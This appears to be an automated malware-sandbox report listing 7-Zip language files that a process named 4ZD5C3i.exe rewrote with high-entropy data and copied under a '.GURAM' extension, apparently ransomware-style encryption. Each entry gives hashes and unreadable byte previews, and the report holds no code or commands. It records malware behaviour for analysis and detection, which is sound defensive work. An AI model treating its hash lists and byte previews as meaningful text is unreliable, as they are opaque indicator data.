                                                                                                                                                                                                                                                SHA-512:7EC5A7A19D84EA88D7DD28F54277E11A825AE98B20DE06568739CC53A209B2FF1287BC7ADA6B87F9D8D4826D7B172067883AB5095CE0BBF810E38A00DD4C62C9
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..%.\"..@.u}5c..X...q;....er{C.4..$.@.....>.EW.d.|<p{.c..DZ...N.n.g..\.V.....W..4.....T...f..M....E....s...SF.......M....]..]..../?i........p.........r...0...].l.v.-......V.U...P-.5_....w<....p.7'X.}}.$...|g.K.Y....+........5K.a...Cz_../r...E....PQ j....X.R.....46u...B.T.S.8M...3.L..6.|.V......P.2O..M..N..0..X...ut.......h.(I..'dD.F.@Nng.$~Z.78.=..M ....yI...$..9..Y.a.*.....o.rm).H.d......7.a..#.im.2E..M.J.g%MM.[.f[.AT.3.`.DS\.)......-.K ..r.o....-......5e.....,...l.,*.....4:..A....._...F./.)}.........e..95...?..f.-S-...p....#..p.:.H......a{....;......Ln..W...i..s.R.=!....G...$w..7.=.).....@f.|.OO...,..F.m...xn.O....|._....,.?x...D`8.*..tC.6J.O....7.1.8.U/.j.{..iu..^...k.....&....&.k=Z!.3..x..h.....|.zY, ..d...<.....$...I...P_.v.E..O.....N.>.}m.lq.M..b .:x.(6s\.g57.t.kTyx.h.(.(D.i.e.J.J......b.n.'....X...*9xD...b.U.0...MC...x.a.!Li7.e.#......\D9._1Z..xh9ncj.r.}G.....6..C.....7!.~.(.....>......;d*.4..B..;~u~`..Q..E"...".+.....4.,D

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\sq.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):6591
                                                                                                                                                                                                                                                Entropy (8bit):7.9713282854175045
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:zameLfPcefie2Tcto06ezjaPR58OSHxu46SVR3F1ycHE4xoaWVRleRp:zaOefie2TctoIzjm2OSHUmR37ygZ6URp
                                                                                                                                                                                                                                                MD5:EF27C368DBA484B897556E17B82259E5
                                                                                                                                                                                                                                                SHA1:9592D3475598261F7AE7422D7F398187A8CC498F
                                                                                                                                                                                                                                                SHA-256:949D25210E0A3AACB8F88C5B86DEBBA685AABC2634FBDA9BC72A87E50A0C7A50
                                                                                                                                                                                                                                                SHA-512:F29C9A87676D99BBAC7E07A457C5422434A7B2B8A2073B7A531C094633D02FB10D282C39398DAE74C85A2ADD44CD58EFDB1BD9083982A744EA8F024420B80047
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.....J..P..e."...7..cs........D.j{L.....xm"&.........O..[...3.Q...V.=....efh.m....;.j$ ...-....)../.....1.k...5...N~...].-."...*..n....0U."..._..._r.-.(.....B.....Ej.V.'U.b\Ox..R..M&...../.....;...Db@....Et.."..;o*.O...._.h.,....<.q........ %.Y4.. .<dj....c0.s@..b..."8.,s8.{%~e..l`.g...j.......4...o&^.(.m.E....Qq.&..+..8..B.Of....Qu.n.f.TFr...=..K..S..k..N.J..#"...2..4?,...U..6"...j......E.......!J......Z...aH......w+...c.o..{.."U.D...Y_2...:.....c@.H}...~..+..*".U.].sV."....p.H.?.1.....:/...U./}..}..k........i..Ta..G. .s?I@......eFB..|.{HQ;_.n........S.%-....Z...59.. ;.9..r.B..<.....Y..#..g..=..vw.>V(.g.....<.&.a.9..l.%.......'.?.a.x.|g.....9..nb..+.[...a.'O..I..[....KXvY....M....YB.a5...'.:M.+..B!w...'=...V]#.9"'?H...z...VP_Y .[..N.x../......i...D[..........s.\IO.'.....NIe....-E.4.m~.EV.)..b...D..M...hP...P(.....e|.s...B..+F3......-#NL...l.w..U...S..R.....2.......Z...>B.3.1;.Y.........H........QZ^9(.@.RT.0iw..F5.&Ij+.c......./

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\sq.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):6591
                                                                                                                                                                                                                                                Entropy (8bit):7.9713282854175045
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:zameLfPcefie2Tcto06ezjaPR58OSHxu46SVR3F1ycHE4xoaWVRleRp:zaOefie2TctoIzjm2OSHUmR37ygZ6URp
                                                                                                                                                                                                                                                MD5:EF27C368DBA484B897556E17B82259E5
                                                                                                                                                                                                                                                SHA1:9592D3475598261F7AE7422D7F398187A8CC498F
                                                                                                                                                                                                                                                SHA-256:949D25210E0A3AACB8F88C5B86DEBBA685AABC2634FBDA9BC72A87E50A0C7A50
                                                                                                                                                                                                                                                SHA-512:F29C9A87676D99BBAC7E07A457C5422434A7B2B8A2073B7A531C094633D02FB10D282C39398DAE74C85A2ADD44CD58EFDB1BD9083982A744EA8F024420B80047
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.....J..P..e."...7..cs........D.j{L.....xm"&.........O..[...3.Q...V.=....efh.m....;.j$ ...-....)../.....1.k...5...N~...].-."...*..n....0U."..._..._r.-.(.....B.....Ej.V.'U.b\Ox..R..M&...../.....;...Db@....Et.."..;o*.O...._.h.,....<.q........ %.Y4.. .<dj....c0.s@..b..."8.,s8.{%~e..l`.g...j.......4...o&^.(.m.E....Qq.&..+..8..B.Of....Qu.n.f.TFr...=..K..S..k..N.J..#"...2..4?,...U..6"...j......E.......!J......Z...aH......w+...c.o..{.."U.D...Y_2...:.....c@.H}...~..+..*".U.].sV."....p.H.?.1.....:/...U./}..}..k........i..Ta..G. .s?I@......eFB..|.{HQ;_.n........S.%-....Z...59.. ;.9..r.B..<.....Y..#..g..=..vw.>V(.g.....<.&.a.9..l.%.......'.?.a.x.|g.....9..nb..+.[...a.'O..I..[....KXvY....M....YB.a5...'.:M.+..B!w...'=...V]#.9"'?H...z...VP_Y .[..N.x../......i...D[..........s.\IO.'.....NIe....-E.4.m~.EV.)..b...D..M...hP...P(.....e|.s...B..+F3......-#NL...l.w..U...S..R.....2.......Z...>B.3.1;.Y.........H........QZ^9(.@.RT.0iw..F5.&Ij+.c......./

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\sr-spc.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):12601
                                                                                                                                                                                                                                                Entropy (8bit):7.982101533444418
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:d8lbYzvR1HE/Ri3mUgCothVCKg9uYgfYOxUARAK:6bYrfE/EWZt/tVlAOGsAK
                                                                                                                                                                                                                                                MD5:AB29E5D32B868A77768592812ABBD10C
                                                                                                                                                                                                                                                SHA1:1D9FB9924E034472A5B26EA4C93596713F646711
                                                                                                                                                                                                                                                SHA-256:D8C2B2B226CBB9B44055E9C9BF4EEE4B9A4DD35C16FEB92A05A6A77EC30961DD
                                                                                                                                                                                                                                                SHA-512:A55A2B1595F8C70A6D4E4B655C3F2804911AAAE26FAA4D81A9595D5553266565F8A0A3543B2C9365E23D401A2B160A7B77BE6D01D755742542562F3351A2FC0D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:1.A......b.j.;..H.g.0 -`B$C..s...........M..A.w.G..qFh....?..V..9c. . M.s.... mk.u...?.+.#H.f+.YB.v.+H.x|.X...[S...u....I\.#)P_......L=..H.n.|l.+.f.6....~[..I0c@...e.!.*.1..O.*A..~..O\/.v4.C.L092g...~.O..8nP..7..pq.......,.K:]..*.`~IO.#....NBtq...#...`.P..........}.%a`.2....p.4K..N.dF.....od..z.]..{..7...1.G~.s.._TK.=5. ^....E...T<N!..&\'..V.H...:.C...8...I...]9.hh.p.$.P..%....z/...o.w.S.-..>Y@f.^{.LA....WSo..tl45H..<.M..s.*.M3...$..}..K6..n....q.......W.at...G..>.hI...)...+-.o*."8kd....a.h....-Dg(.....h....-$.O...|..lmQ ..z....'..q\v.....b-|.~..w@.N@....\...`.x.y.._..3+.....c.h.67.~._bs2.....V7.i...{p.......L.d.............l.. ...........`....IF.%e<"J..&.1y..h.pj...j.=.i.[..N.Y.,y0..A......P...f.o./...G7..J.T,...J...?.f.;G....!...U..N...`.N.P.[l.....6p.....[.M..~..+5...".>.....6....d.y...[...2.P...R.L.h.....\.cN.{..*....%1:...].k..;C..Z^E.......r.. +uy.0v3_i.o)B......N..q...B5 .q..K*...c.,...Yv}.,.'.Aq..YES....$........a...oYD.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\sr-spc.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):12601
                                                                                                                                                                                                                                                Entropy (8bit):7.982101533444418
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:d8lbYzvR1HE/Ri3mUgCothVCKg9uYgfYOxUARAK:6bYrfE/EWZt/tVlAOGsAK
                                                                                                                                                                                                                                                MD5:AB29E5D32B868A77768592812ABBD10C
                                                                                                                                                                                                                                                SHA1:1D9FB9924E034472A5B26EA4C93596713F646711
                                                                                                                                                                                                                                                SHA-256:D8C2B2B226CBB9B44055E9C9BF4EEE4B9A4DD35C16FEB92A05A6A77EC30961DD
                                                                                                                                                                                                                                                SHA-512:A55A2B1595F8C70A6D4E4B655C3F2804911AAAE26FAA4D81A9595D5553266565F8A0A3543B2C9365E23D401A2B160A7B77BE6D01D755742542562F3351A2FC0D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:1.A......b.j.;..H.g.0 -`B$C..s...........M..A.w.G..qFh....?..V..9c. . M.s.... mk.u...?.+.#H.f+.YB.v.+H.x|.X...[S...u....I\.#)P_......L=..H.n.|l.+.f.6....~[..I0c@...e.!.*.1..O.*A..~..O\/.v4.C.L092g...~.O..8nP..7..pq.......,.K:]..*.`~IO.#....NBtq...#...`.P..........}.%a`.2....p.4K..N.dF.....od..z.]..{..7...1.G~.s.._TK.=5. ^....E...T<N!..&\'..V.H...:.C...8...I...]9.hh.p.$.P..%....z/...o.w.S.-..>Y@f.^{.LA....WSo..tl45H..<.M..s.*.M3...$..}..K6..n....q.......W.at...G..>.hI...)...+-.o*."8kd....a.h....-Dg(.....h....-$.O...|..lmQ ..z....'..q\v.....b-|.~..w@.N@....\...`.x.y.._..3+.....c.h.67.~._bs2.....V7.i...{p.......L.d.............l.. ...........`....IF.%e<"J..&.1y..h.pj...j.=.i.[..N.Y.,y0..A......P...f.o./...G7..J.T,...J...?.f.;G....!...U..N...`.N.P.[l.....6p.....[.M..~..+5...".>.....6....d.y...[...2.P...R.L.h.....\.cN.{..*....%1:...].k..;C..Z^E.......r.. +uy.0v3_i.o)B......N..q...B5 .q..K*...c.,...Yv}.,.'.Aq..YES....$........a...oYD.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\sr-spl.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):7777
                                                                                                                                                                                                                                                Entropy (8bit):7.9764636860657
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:HFII5SV5R4cV1ZS3wEbcJUo+ivnwPDTAUB:HFII5aISVPEDbB
                                                                                                                                                                                                                                                MD5:DE0EAB62EFB74204B096379C54E81328
                                                                                                                                                                                                                                                SHA1:571E8AA96F06A33139608107FFF9D17A9F44B565
                                                                                                                                                                                                                                                SHA-256:38E3DBF8161B55EEDA30DD334C749F1BB583FFE2D2AFC27CD902894D54A0D513
                                                                                                                                                                                                                                                SHA-512:656452EDA50D6AB2F0D42C585A4C0AF366A4D6B52916E777EC10CB391D3951FE7B1DAF29DF54C5C0B498CC03FD1CB8788418EA34B17E49F1AA0BD6B2527250F0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:=.........F."...<..!.....n%....?..".3..T.-..){.i..l.u.....#x...?4.!P.....#|.Z*p..3.NV2HX.$...h..z.H..qE.=...$.g.d_...S.._.o....',..Cn..b.bX.....~{..m.....4].A../|.NH...R.....G..p..U.......v.KG.._.......|..E......1..6q...(...}.3\..}.7....YW,h.H.[.&J.y....T.S,W.~o...l.-.2A.U......|rw....vPi.n)f..`...U....{..{.........x.\V...'7....K......v$....>..W....L$.......}.@...Jp...f.G..k[!....Fj.FE......;.?O...]B..sb..Am.;..(?i...O....4=I\Y..-..R...j.{Xq0.w...q...\'eX....\.%......T_...h.....Th4h.=....q....'r.7.%o...r.................3.`.t#'.0.....N.H...9.....o.w;>........W...D....Fn...y_M}.Qt...O..,o"~..Q..X..i..6.h..x../......|.....Sq...XoKm<..8..h.G........`./.......C.A.3..-.^.N.M;O.....1.|.2Nr..0..f*.$[Z.(@W.7..%....U.g...0q..*.t/y._.%..r1..g8O.....n.Pm...s.y.^..G..t..x..:.N.p.C{cb..6...[IF.....5q.!..c.Cm^.x........,4.u..#Q..!.?7..%.?......z.c..J...%.u..Yw.$.#V.....w..m.$..^. .....6ST.~~..hp.....(.r.ks.....Qv.{4...|...b.-L...r....b.M..3.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\sr-spl.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):7777
                                                                                                                                                                                                                                                Entropy (8bit):7.9764636860657
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:HFII5SV5R4cV1ZS3wEbcJUo+ivnwPDTAUB:HFII5aISVPEDbB
                                                                                                                                                                                                                                                MD5:DE0EAB62EFB74204B096379C54E81328
                                                                                                                                                                                                                                                SHA1:571E8AA96F06A33139608107FFF9D17A9F44B565
                                                                                                                                                                                                                                                SHA-256:38E3DBF8161B55EEDA30DD334C749F1BB583FFE2D2AFC27CD902894D54A0D513
                                                                                                                                                                                                                                                SHA-512:656452EDA50D6AB2F0D42C585A4C0AF366A4D6B52916E777EC10CB391D3951FE7B1DAF29DF54C5C0B498CC03FD1CB8788418EA34B17E49F1AA0BD6B2527250F0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:=.........F."...<..!.....n%....?..".3..T.-..){.i..l.u.....#x...?4.!P.....#|.Z*p..3.NV2HX.$...h..z.H..qE.=...$.g.d_...S.._.o....',..Cn..b.bX.....~{..m.....4].A../|.NH...R.....G..p..U.......v.KG.._.......|..E......1..6q...(...}.3\..}.7....YW,h.H.[.&J.y....T.S,W.~o...l.-.2A.U......|rw....vPi.n)f..`...U....{..{.........x.\V...'7....K......v$....>..W....L$.......}.@...Jp...f.G..k[!....Fj.FE......;.?O...]B..sb..Am.;..(?i...O....4=I\Y..-..R...j.{Xq0.w...q...\'eX....\.%......T_...h.....Th4h.=....q....'r.7.%o...r.................3.`.t#'.0.....N.H...9.....o.w;>........W...D....Fn...y_M}.Qt...O..,o"~..Q..X..i..6.h..x../......|.....Sq...XoKm<..8..h.G........`./.......C.A.3..-.^.N.M;O.....1.|.2Nr..0..f*.$[Z.(@W.7..%....U.g...0q..*.t/y._.%..r1..g8O.....n.Pm...s.y.^..G..t..x..:.N.p.C{cb..6...[IF.....5q.!..c.Cm^.x........,4.u..#Q..!.?7..%.?......z.c..J...%.u..Yw.$.#V.....w..m.$..^. .....6ST.~~..hp.....(.r.ks.....Qv.{4...|...b.-L...r....b.M..3.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\sv.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9833
                                                                                                                                                                                                                                                Entropy (8bit):7.97871260837259
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:UdmEkSDbgYwvWljAkSF90cXBN9aWUccz9IXHl0uh/Up:U4bE+vWm9/RD7XHqNp
                                                                                                                                                                                                                                                MD5:BB5AB3F7B348E702BE14C892BD055F04
                                                                                                                                                                                                                                                SHA1:BA0E9FE9B50BBC08F71E973803E27FBADD645F05
                                                                                                                                                                                                                                                SHA-256:9868B8298F7077463247939F87FCDEA433CAC5F6D76E30879813B8B55E7D7CEE
                                                                                                                                                                                                                                                SHA-512:6FA86AB17CE62402328D10770166BA6CFD203A844599FEF6471640A191D94837864B8BE1FBDDCB9BC56CA6DFBC0EA3F448E4675E941A402AFB7A958337B5B088
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:p...3....N#.{.pp\.....;.....J*.I7.YqK?....&K...)..5)..|..>..l..p.....b...'....z...."...i...de.9....2...'..I..;-.....[&........^....ND..b.K/O`..qU.v.....K..\r7...b.*.n.E.7..&..g.oH..-..FT....s.<..f....wi.X..d.....=N3Lu9vTR...=w!..c.!J.~.#.F[..Za..#.i.|....o....e.U....3....5....Z....D.s.....a......=t...A....[.*&Do.....'..P...y.}.-6: ..]-.....LY.....LIv=.G..It.Vg.g}..bD.......p.b.o... .N,#.......I@....5.1`7.......=......~Gn?&...Z............v?.~. ..f<{]....H.k..6i.... .|2....T..%f@.>..9.r.yl......O.mS.V..$....]........c.H...k....>y>......%.F0.......E&..........d.S.|...7I....2.C.cS@..k6..8.jB.z.7......_d.cw..3...;K\.4._.aQ...F.M.`......l..E;.P..f..W...3e........1.q..z`.!.mU.r..J..i....f}..?.$.f......`M-{.#.f..{..Hy.^c...o.x.@.*..2=2O].K...q.r.....E..8...p.3....E...'n.9G..I.Yv.n..D..Yq..X..... .&G..YA...B.p]..K.].-....jA+`n.e.."...`>..n.au.=...G..$1.[.F.C+..y|q..}..5...'.O.%z!.BR..x......;.."-yv.y...V......../..x[.X..imL.p .oA..z...

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\sv.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9833
                                                                                                                                                                                                                                                Entropy (8bit):7.97871260837259
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:UdmEkSDbgYwvWljAkSF90cXBN9aWUccz9IXHl0uh/Up:U4bE+vWm9/RD7XHqNp
                                                                                                                                                                                                                                                MD5:BB5AB3F7B348E702BE14C892BD055F04
                                                                                                                                                                                                                                                SHA1:BA0E9FE9B50BBC08F71E973803E27FBADD645F05
                                                                                                                                                                                                                                                SHA-256:9868B8298F7077463247939F87FCDEA433CAC5F6D76E30879813B8B55E7D7CEE
                                                                                                                                                                                                                                                SHA-512:6FA86AB17CE62402328D10770166BA6CFD203A844599FEF6471640A191D94837864B8BE1FBDDCB9BC56CA6DFBC0EA3F448E4675E941A402AFB7A958337B5B088
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:p...3....N#.{.pp\.....;.....J*.I7.YqK?....&K...)..5)..|..>..l..p.....b...'....z...."...i...de.9....2...'..I..;-.....[&........^....ND..b.K/O`..qU.v.....K..\r7...b.*.n.E.7..&..g.oH..-..FT....s.<..f....wi.X..d.....=N3Lu9vTR...=w!..c.!J.~.#.F[..Za..#.i.|....o....e.U....3....5....Z....D.s.....a......=t...A....[.*&Do.....'..P...y.}.-6: ..]-.....LY.....LIv=.G..It.Vg.g}..bD.......p.b.o... .N,#.......I@....5.1`7.......=......~Gn?&...Z............v?.~. ..f<{]....H.k..6i.... .|2....T..%f@.>..9.r.yl......O.mS.V..$....]........c.H...k....>y>......%.F0.......E&..........d.S.|...7I....2.C.cS@..k6..8.jB.z.7......_d.cw..3...;K\.4._.aQ...F.M.`......l..E;.P..f..W...3e........1.q..z`.!.mU.r..J..i....f}..?.$.f......`M-{.#.f..{..Hy.^c...o.x.@.*..2=2O].K...q.r.....E..8...p.3....E...'n.9G..I.Yv.n..D..Yq..X..... .&G..YA...B.p]..K.].-....jA+`n.e.."...`>..n.au.=...G..$1.[.F.C+..y|q..}..5...'.O.%z!.BR..x......;.."-yv.y...V......../..x[.X..imL.p .oA..z...

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\sw.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9142
                                                                                                                                                                                                                                                Entropy (8bit):7.9809992811382084
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:3kE4fEE+rcYl/k9f+VHTp2QaFztmGZ86/F83CSAi5n1j5yUD:3knAU3DxY286/Cf5pD
                                                                                                                                                                                                                                                MD5:73260875A58C7966ED9EA59FE7C599B6
                                                                                                                                                                                                                                                SHA1:DA2627AD08435FC2CBE248D138416EE1A77ABDB9
                                                                                                                                                                                                                                                SHA-256:B43975D5379C8521585BE0748E8A00FFF35B7A4390E810BB24836A6D462ED766
                                                                                                                                                                                                                                                SHA-512:848502DA691D4DA0EE42AD2865510D113B50D74E16890D2E4B613059DD1C873A150312FF0C9BE52D7CCBA93166B80E7911DA83E11E74F72E65B6BB41DE2AB598
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.I/...T.Eu.1.5A.wA.z...'.3.J.w5...[`i...67;*....8..P.d$3....../..P...WN...2....d.LT........S..%5.=..1..:..{?.....gQ%...I......cH...f.~x.QKn...l..S.1..PD.1d.].[...}.}>.k.f......@y.W.... '.....77.........S......d......0A.B..r.....Xt......zC.5..2.tP.v....T...g.<.m..3.....s.....1....C...1....2.E..*+..y.......k...PV(.."w]..=o.y.{.G......p..:.vhz'.{...=J..$U.F...0..\'...9 .\.....m./ex...........1.. .:...k.X.q..c(JRE.....o.....}=.L1-y.....q....R......$..?rnZ.jI.9.....7...>...&............$.>.-.+...m!|z...pJ......X..T.]6..._E2z1DjE...[..$.....5."?.?,V.N.*.KqNS..e<...m.$?.U...i....~..#..........YL......X-.....|.c43CZ....q.;a.....U...Yb..%O.....q.t...b.D..........<.o....d...a....R..L..*@np{z....D..0*...y&G~s..k\ax.....+.A.E..~.......T.~...?.X>.m/...X..".......?t$.^..^.y...s.5....Z3.hP.y^7...Z..%.....4V..5.:e.0...r...vT.....}.g..h..q........O..sk7....Hn..Q.iQ...GD...ZX.CJ..mq.bx(........4.........{......O.6.m"...l<^.\..>.......E7..0..N..V.x..xw..

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\sw.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9142
                                                                                                                                                                                                                                                Entropy (8bit):7.9809992811382084
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:3kE4fEE+rcYl/k9f+VHTp2QaFztmGZ86/F83CSAi5n1j5yUD:3knAU3DxY286/Cf5pD
                                                                                                                                                                                                                                                MD5:73260875A58C7966ED9EA59FE7C599B6
                                                                                                                                                                                                                                                SHA1:DA2627AD08435FC2CBE248D138416EE1A77ABDB9
                                                                                                                                                                                                                                                SHA-256:B43975D5379C8521585BE0748E8A00FFF35B7A4390E810BB24836A6D462ED766
                                                                                                                                                                                                                                                SHA-512:848502DA691D4DA0EE42AD2865510D113B50D74E16890D2E4B613059DD1C873A150312FF0C9BE52D7CCBA93166B80E7911DA83E11E74F72E65B6BB41DE2AB598
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.I/...T.Eu.1.5A.wA.z...'.3.J.w5...[`i...67;*....8..P.d$3....../..P...WN...2....d.LT........S..%5.=..1..:..{?.....gQ%...I......cH...f.~x.QKn...l..S.1..PD.1d.].[...}.}>.k.f......@y.W.... '.....77.........S......d......0A.B..r.....Xt......zC.5..2.tP.v....T...g.<.m..3.....s.....1....C...1....2.E..*+..y.......k...PV(.."w]..=o.y.{.G......p..:.vhz'.{...=J..$U.F...0..\'...9 .\.....m./ex...........1.. .:...k.X.q..c(JRE.....o.....}=.L1-y.....q....R......$..?rnZ.jI.9.....7...>...&............$.>.-.+...m!|z...pJ......X..T.]6..._E2z1DjE...[..$.....5."?.?,V.N.*.KqNS..e<...m.$?.U...i....~..#..........YL......X-.....|.c43CZ....q.;a.....U...Yb..%O.....q.t...b.D..........<.o....d...a....R..L..*@np{z....D..0*...y&G~s..k\ax.....+.A.E..~.......T.~...?.X>.m/...X..".......?t$.^..^.y...s.5....Z3.hP.y^7...Z..%.....4V..5.:e.0...r...vT.....}.g..h..q........O..sk7....Hn..Q.iQ...GD...ZX.CJ..mq.bx(........4.........{......O.6.m"...l<^.\..>.......E7..0..N..V.x..xw..

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\ta.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):13069
                                                                                                                                                                                                                                                Entropy (8bit):7.984358556866305
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:mwUln08/yKU++7d1e19Mm4toqn5So/1HDb4sila:mwUlnB/1+J1e/78S+1X4Zla
                                                                                                                                                                                                                                                MD5:228FF3B15A42EA04804097CF4A58A3FA
                                                                                                                                                                                                                                                SHA1:E3215D675273869BF89D61B0FCAA83A4D1030923
                                                                                                                                                                                                                                                SHA-256:1AFD6C4E3A9F898735B4CC4EA74F1DDD0D1A8B9A541620CD6A1B1BF4A25CF2EE
                                                                                                                                                                                                                                                SHA-512:FD231B113856785EB0F84170882DF68B6ADEC69B3FF51C75835F4EFD9DDD3B11C4864E5A5CBC0A462439EF0098EDD11BA7DBAABF86E718F85BD867DBE181A9E7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:5^.@..y7........S..=AC+..}(..=..`.GkG...P...1a...'../...z..7.0...WI..C.|..~....8A.-....]...]`..w..[.4...$6U..J....e._}}..G\.o......Wp.RGu.n (1N0....Oa}...M:%T.....V......SA.zOS..._Qi@?.L....mA.....7.\...F5.;.UO........%..NU.$...|p.h.'..h.....J.F_.._ .....L{..:...,W..o.?v..N.iKe.=f.M...F...'..1YU&>.c;.....v......:.ef.......Z....s.....S...:P.....%FS..xeTf8..3.CT.........i8....v.!/..)=C.F.Z...^j....f.nT..K...Uk.r...'M.w.'...Vl..@4.WB....n..WZ....Oz.7.aCc.].9..@.!....3.,h.f\.P.y.....].[l.........].n....R.OKM...{......Ct.?....NQ}A-!^U=?(.,..C.....K.F...,GD.O.5j8y.2q........3v..'j...2m.D5.......s..f.H.4....a......h....h....f...N.8...6r....I[....Z...3....A..t=.+...UI}]..&...u.80..Ch.ynWf0.'T.im9J..U|../7..E....V.Rg..u.....%.GNRuuCl....~..j.?S\$..I>%u.)6r.8......V.b9.k./"..Z.1s....|.fgK_.....[...~h...Z.x*+.yD.(.._&..l..M.I.d.....EN.Yq....F.-I..{Q...r'|.........y,.h.1.........6W..O..U......md..MN.T..h...[....M..1./..e.u..<g.....a...P.X.:}jb.3o7..8......

